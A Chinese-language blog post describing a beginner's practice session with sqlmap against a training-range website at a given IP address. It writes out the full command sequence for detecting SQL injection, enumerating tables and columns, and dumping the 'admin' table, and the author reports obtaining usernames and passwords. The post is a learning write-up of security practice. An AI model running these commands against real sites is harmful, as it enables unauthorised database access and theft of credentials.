記一次sqlmap對某靶場網站的掃描


本次練習的網站是一個靶場網站,由於是第一次練習sqlmap工具,我只用來查看了目標網站的幾個數據庫和表格元素,不禁感嘆這工具真的挺厲害

http://117.41.229.122:8003/?id=1

 

工具:kali虛擬機自帶的sqlmap工具

首先進入終端:

輸入一個檢測SQL漏洞的命令:sqlmap -u "http://117.41.229.122:8003/?id=1"

檢測到了“id”標簽的SQL漏洞及可能的注入類型、以及目標網站的服務器構架及其版本,以及MySQL的版本。

接着查找一下該網站的數據庫和表格內容:sqlmap -u "http://117.41.229.122:8003/?id=1" --tables

可以看到有一個數據庫叫“maoshe”,里面有4個表格分別是admin、dirs、news、xss。最后我們來查看一下各個表格的內容元素(每一列columns的數據結構)

 

以admin和xss為例:

sqlmap -u "http://117.41.229.122:8003/?id=1" --columns -T admin

sqlmap -u "http://117.41.229.122:8003/?id=1" --columns -T xss

 

已知有一個表叫做admin,我們想獲得表中數據的密碼,需要列出這個表的數據:

sqlmap -u "http://117.41.229.122:8003/?id=1" --dump -T admin

就獲取到了用戶名和密碼。

 

 這次實踐的成功讓我感到欣喜,感覺一扇嶄新的大門想我敞開,我要繼續去探索這有趣的世界。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM